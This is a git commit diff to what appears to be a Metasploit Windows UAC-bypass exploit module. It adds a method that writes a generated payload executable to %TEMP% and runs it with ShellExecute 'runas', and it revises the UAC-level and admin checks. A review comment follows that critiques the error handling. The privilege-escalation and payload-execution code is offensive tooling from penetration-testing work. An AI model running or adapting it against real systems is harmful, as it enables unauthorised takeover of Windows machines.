Update bypassuac_injection inline with latest privs lib

bug/bundler_fix
Meatballs 2013-10-23 21:15:41 +01:00
parent e6a2a1006f
commit 6fdf5cab15
No known key found for this signature in database
GPG Key ID: 5380EAF01F2F8B38
1 changed files with 31 additions and 21 deletions


@ -12,7 +12,6 @@ class Metasploit3 < Msf::Exploit::Local
Rank = ExcellentRanking
include Exploit::EXE
include Post::Common
include Post::File
include Post::Windows::Priv
@ -52,9 +51,20 @@ class Metasploit3 < Msf::Exploit::Local
end
def runas_method
payload = generate_payload_exe
payload_filename = Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
tmpdir = expand_path("%TEMP%")
tempexe = tmpdir + "\\" + payload_filename
write_file(tempexe, payload)
print_status("Uploading payload: #{tempexe}")
session.railgun.shell32.ShellExecuteA(nil,"runas",tempexe,nil,nil,5)
print_status("Payload executed")
end
def exploit
fail_with(Exploit::Failure::None, 'Already in elevated state') if is_admin?
fail_with(Exploit::Failure::None, 'Already in elevated state') if is_admin? or is_system?
#
# Verify use against Vista+
@ -65,25 +75,27 @@ class Metasploit3 < Msf::Exploit::Local
end
if is_uac_enabled?
vprint_status "UAC is Enabled, checking level..."
print_status "UAC is Enabled, checking level..."
else
fail_with(Exploit::Failure::NotVulnerable,
"UAC is not enabled, no reason to run module, exiting...\r\nRun exploit/windows/local/ask to elevate"
)
if is_in_admin_group?
fail_with(Exploit::Failure::Unknown, "UAC is disabled and we are in the admin group so something has gone wrong...")
else
fail_with(Exploit::Failure::NoAccess, "Not in admins group, cannot escalate with this module")
end
end
case get_uac_level
when UACPromptCredsIfSecureDesktop, UACPromptConsentIfSecureDesktop, UACPromptCreds, UACPromptConsent
fail_with(Exploit::Failure::NotVulnerable,
"UAC is set to 'Always Notify'\r\nThis module does not bypass this setting, exiting..."
)
when UACDefault
print_good "UAC is set to Default"
vprint_status "BypassUAC can bypass this setting, continuing..."
when UACNoPrompt
fail_with(Exploit::Failure::NotVulnerable,
"UAC is not enabled, no reason to run module\r\nRun exploit/windows/local/ask to elevate"
)
when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP, UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP, UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT
fail_with(Exploit::Failure::NotVulnerable,
"UAC is set to 'Always Notify'\r\nThis module does not bypass this setting, exiting..."
)
when UAC_DEFAULT
print_good "UAC is set to Default"
print_good "BypassUAC can bypass this setting, continuing..."
when UAC_NO_PROMPT
print_warning "UAC set to DoNotPrompt - using ShellExecute 'runas' method instead"
runas_method
return
end
# Check if you are an admin
@ -97,13 +109,11 @@ class Metasploit3 < Msf::Exploit::Local
if admin_group
print_good('Part of Administrators group! Continuing...')
else
print_error('Not in admins group, cannot escalate with this module')
print_error('Exiting...')
return
fail_with(Exploit::Failure::NoAccess, "Not in admins group, cannot escalate with this module")
end
end
if get_integrity_level == LowIntegrityLevel
if get_integrity_level == INTEGRITY_LEVEL_SID[:low]
fail_with(Exploit::Failure::NoAccess, "Cannot BypassUAC from Low Integrity Level")
end
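Review bot: In the new `runas_method` (second hunk) the result of `ShellExecuteA` is discarded and `print_status("Payload executed")` runs unconditionally, so the module log claims execution even when the call failed. The `UAC_NO_PROMPT` branch in the third hunk also returns before the admin-group and integrity-level checks visible in the last hunk, so nothing confirms those preconditions on that path. I would capture the result and fail explicitly, e.g. `res = session.railgun.shell32.ShellExecuteA(nil,"runas",tempexe,nil,nil,5)` followed by `fail_with(Exploit::Failure::Unknown, "ShellExecute 'runas' failed") unless res['return'] > 32`. The "Uploading payload" message is printed only after `write_file` has already run, and the executable written under %TEMP% is never removed or recorded, so the method should carry a comment saying it leaves that file on disk for the operator to account for in the engagement record. The body of `exploit` continues outside the hunks shown.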